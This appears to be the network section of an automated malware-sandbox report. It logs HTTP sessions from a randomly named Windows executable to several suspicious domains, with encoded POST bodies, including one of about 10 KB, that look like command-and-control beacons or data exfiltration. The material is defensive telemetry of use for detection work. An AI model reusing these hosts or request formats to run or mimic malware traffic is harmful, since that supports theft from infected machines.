                                                          Jul 3, 2024 15:57:05.759968996 CEST1236INHTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:05 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                          Jul 3, 2024 15:57:05.760221004 CEST31INData Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.44974176.223.105.230801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:07.820550919 CEST464OUTGET /i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:57:08.515039921 CEST1236INHTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:08 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                          Jul 3, 2024 15:57:08.515057087 CEST31INData Raw: 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: </div></div></body></html>
                                                          Jul 3, 2024 15:57:08.519464016 CEST1236INHTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:08 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.44974235.244.172.47801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:13.908701897 CEST738OUTPOST /5uz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          Origin: http://www.ajjmamlllqqq.xyz
                                                          Referer: http://www.ajjmamlllqqq.xyz/5uz4/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 51 4a 51 38 6d 35 77 71 47 59 44 66 62 5a 6c 4f 34 59 68 59 65 64 72 64 63 42 61 52 66 55 65 7a 6e 41 74 4a 6e 5a 6b 72 5a 6a 4b 2b 71 31 50 32 70 67 61 38 55 47 43 6f 64 76 55 4d 74 48 4f 65 6d 49 63 72 2b 79 51 64 31 30 32 4d 4b 72 77 33 46 30 42 68 56 54 59 42 44 32 58 4f 62 69 37 51 45 72 6e 61 69 64 50 38 6d 39 30 4e 43 2b 6f 32 35 6f 47 65 4d 2b 7a 71 48 6f 41 7a 39 70 6f 44 37 44 35 34 53 46 74 50 51 51 4b 51 6f 4f 72 47 66 66 77 47 4f 6a 42 55 45 68 2f 73 5a 6e 6f 44 53 56 77 68 30 65 31 43 5a 59 4e 41 55 68 59 65 59 4e 64 79 77 6d 74 36 77 43 31 37 72 35 59 73 63 51 3d 3d
                                                          Data Ascii: TvpPfhGp=QJQ8m5wqGYDfbZlO4YhYedrdcBaRfUeznAtJnZkrZjK+q1P2pga8UGCodvUMtHOemIcr+yQd102MKrw3F0BhVTYBD2XObi7QErnaidP8m90NC+o25oGeM+zqHoAz9poD7D54SFtPQQKQoOrGffwGOjBUEh/sZnoDSVwh0e1CZYNAUhYeYNdywmt6wC17r5YscQ==
                                                          Jul 3, 2024 15:57:14.567435026 CEST333INHTTP/1.1 405 Method Not Allowed
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.44974335.244.172.47801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:16.442389965 CEST758OUTPOST /5uz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          Origin: http://www.ajjmamlllqqq.xyz
                                                          Referer: http://www.ajjmamlllqqq.xyz/5uz4/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 51 4a 51 38 6d 35 77 71 47 59 44 66 61 36 39 4f 37 2f 31 59 56 64 72 65 53 68 61 52 51 30 65 33 6e 41 68 4a 6e 59 77 37 59 52 65 2b 71 58 48 32 75 68 61 38 52 47 43 6f 53 50 55 46 7a 33 4f 76 6d 49 41 6a 2b 32 51 64 31 30 79 4d 4b 76 30 33 46 48 5a 69 61 6a 59 50 4d 57 58 4d 66 69 37 51 45 72 6e 61 69 63 2f 61 6d 39 38 4e 44 50 59 32 35 4a 47 5a 54 4f 7a 70 45 6f 41 7a 35 70 6f 50 37 44 35 67 53 45 78 31 51 57 57 51 6f 4c 48 47 66 4c 6b 46 46 6a 41 2b 4a 42 2b 39 64 58 6c 6b 66 77 38 71 36 4e 34 73 51 4d 42 6d 56 6e 4a 45 4a 38 38 6c 69 6d 4a 4a 74 46 38 50 6d 36 6c 6c 48 65 56 6b 53 62 67 50 46 53 68 6a 6b 64 41 7a 47 2f 77 75 79 36 4d 3d
                                                          Data Ascii: TvpPfhGp=QJQ8m5wqGYDfa69O7/1YVdreShaRQ0e3nAhJnYw7YRe+qXH2uha8RGCoSPUFz3OvmIAj+2Qd10yMKv03FHZiajYPMWXMfi7QErnaic/am98NDPY25JGZTOzpEoAz5poP7D5gSEx1QWWQoLHGfLkFFjA+JB+9dXlkfw8q6N4sQMBmVnJEJ88limJJtF8Pm6llHeVkSbgPFShjkdAzG/wuy6M=
                                                          Jul 3, 2024 15:57:17.101556063 CEST176INHTTP/1.1 405 Method Not Allowed
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Jul 3, 2024 15:57:17.101614952 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.44974435.244.172.47801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:18.973505020 CEST10840OUTPOST /5uz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          Origin: http://www.ajjmamlllqqq.xyz
                                                          Referer: http://www.ajjmamlllqqq.xyz/5uz4/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 51 4a 51 38 6d 35 77 71 47 59 44 66 61 36 39 4f 37 2f 31 59 56 64 72 65 53 68 61 52 51 30 65 33 6e 41 68 4a 6e 59 77 37 59 51 6d 2b 71 45 66 32 6f 47 4f 38 53 47 43 6f 62 76 55 41 7a 33 4f 79 6d 49 59 6e 2b 32 56 71 31 32 61 4d 49 4b 67 33 44 79 31 69 42 7a 59 50 55 6d 58 4e 62 69 36 61 45 72 33 65 69 63 50 61 6d 39 38 4e 44 4e 41 32 2f 59 47 5a 41 65 7a 71 48 6f 41 2f 39 70 6f 72 37 48 56 65 53 45 6b 43 58 67 6d 51 6f 76 6e 47 65 34 63 46 5a 7a 42 59 4d 42 2b 6c 64 58 70 37 66 77 4a 54 36 4f 6c 33 51 4c 4a 6d 57 41 6b 69 62 4f 38 61 78 58 74 62 32 43 63 58 2f 49 56 47 4a 4f 78 36 52 4a 41 52 57 44 5a 73 70 63 39 6d 58 76 56 30 6a 4e 2b 43 37 36 6d 5a 4f 78 36 69 76 64 4f 76 7a 6e 47 64 31 79 48 6c 68 36 30 2f 34 36 38 38 64 30 78 56 6e 46 78 49 4b 4a 4d 37 62 44 6d 49 39 4b 44 6b 69 43 31 51 51 71 30 58 32 41 58 37 31 6e 47 65 6c 4c 34 57 66 64 42 32 4b 33 50 34 74 73 4f 76 68 5a 6d 32 66 45 61 66 43 37 63 49 43 75 55 44 30 70 34 75 75 72 38 41 71 78 4e 59 5a 5a 30 71 34 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=QJQ8m5wqGYDfa69O7/1YVdreShaRQ0e3nAhJnYw7YQm+qEf2oGO8SGCobvUAz3OymIYn+2Vq12aMIKg3Dy1iBzYPUmXNbi6aEr3eicPam98NDNA2/YGZAezqHoA/9por7HVeSEkCXgmQovnGe4cFZzBYMB+ldXp7fwJT6Ol3QLJmWAkibO8axXtb2CcX/IVGJOx6RJARWDZspc9mXvV0jN+C76mZOx6ivdOvznGd1yHlh60/4688d0xVnFxIKJM7bDmI9KDkiC1QQq0X2AX71nGelL4WfdB2K3P4tsOvhZm2fEafC7cICuUD0p4uur8AqxNYZZ0q4HMu73UmvqMKYKo6bgjygAIF9g2JkzRrgJHOl1bKZ26tyHziCWTOKVmQ896wWCTsThn5zcB1fkwnLzM3AafFTI7Z/XXcd8AoLk6W29xkMVz+sX9MhHC9IZdMJAxjC+pYGKdHgB3AKR+oXRBdpc1Ry7bz6OomPq9/1gjKPzKZAV6GQV79Pm/I3h830m3kZzcIew31hocuWRumupt1Wicg9+ZISxxkuXTYmurP9OCcK4u0UFNZdV6bFNzL6irBzO7k+LE3boL9pN7T6Vr6YtIDUgmREnrgQDWhgQvCJffSa+rhyr+QMMT+kr/b78MBL28UXdF1vHpZtijTx3ZlS+l4AvA4rtQDskdHfO2FDTRc8Hqwj3k1FaE9tmIymRMpNueExefrwXbVAKvGE6MDLDcIlrD6fVIyDcWMs4UV7Md7beVlNtlX1EUjIE3zdccm17Pqa4WZpkB9A3f9lV+qTMA6rHQBVgF6Fg+MFjMWKMfcHGvR2hLwWQzDYSIVc1lsi7T+pTLlpvv/2th70zmqnR56mvA0tPy6B8XfLe0bgefFERfJ8il5ap92I8QdZH1uunoG5l79CGD8EDQnti3SRCO/F6xRvU9PG1mfXorED8d2ZYLKECzAiyKFgIpV4PXOK8Vs3fC5fydl0MXtQeMxCOz1xEO2JTBNiUnwlNY [TRUNCATED]
                                                          Jul 3, 2024 15:57:19.728038073 CEST176INHTTP/1.1 405 Method Not Allowed
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Jul 3, 2024 15:57:19.728055954 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.44974535.244.172.47801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:21.504600048 CEST465OUTGET /5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.ajjmamlllqqq.xyz
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:57:22.139457941 CEST300INHTTP/1.1 200 OK
                                                          Server: nginx/1.20.2
                                                          Date: Wed, 03 Jul 2024 13:57:22 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 5161
                                                          Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                          Vary: Accept-Encoding
                                                          ETag: "65a4939c-1429"
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Jul 3, 2024 15:57:22.152919054 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                          Jul 3, 2024 15:57:22.152940035 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                                          Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                          Jul 3, 2024 15:57:22.152954102 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                                          Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                          Jul 3, 2024 15:57:22.153023958 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                                          Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                          Jul 3, 2024 15:57:22.153037071 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                          Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449746154.23.7.170801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:27.391318083 CEST723OUTPOST /ixzv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          Origin: http://www.114lala.net
                                                          Referer: http://www.114lala.net/ixzv/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 36 71 4b 63 72 38 6b 33 2b 4b 4d 2f 44 6f 6e 38 33 33 4d 2b 2b 6a 46 31 52 78 4f 63 42 6b 48 48 6d 57 2f 65 35 49 38 38 54 32 2f 69 30 4c 4b 49 2b 52 54 37 72 4e 68 42 50 53 4f 55 64 43 6b 61 77 2b 6b 63 31 35 54 65 77 42 42 67 77 4a 34 69 4b 71 56 70 66 38 43 66 31 4f 68 62 6c 6f 43 35 39 54 74 4f 56 44 76 6f 50 58 55 69 46 69 4f 2f 65 69 43 48 72 2f 61 77 65 66 46 7a 73 6a 62 58 4a 6e 44 6e 39 38 67 49 53 71 37 7a 78 41 4f 51 55 69 54 57 58 5a 54 64 54 6b 51 2b 36 5a 63 36 6a 54 65 79 30 47 57 4f 74 44 46 58 37 44 53 69 37 33 34 43 37 65 41 66 35 62 44 38 57 58 42 69 48 51 3d 3d
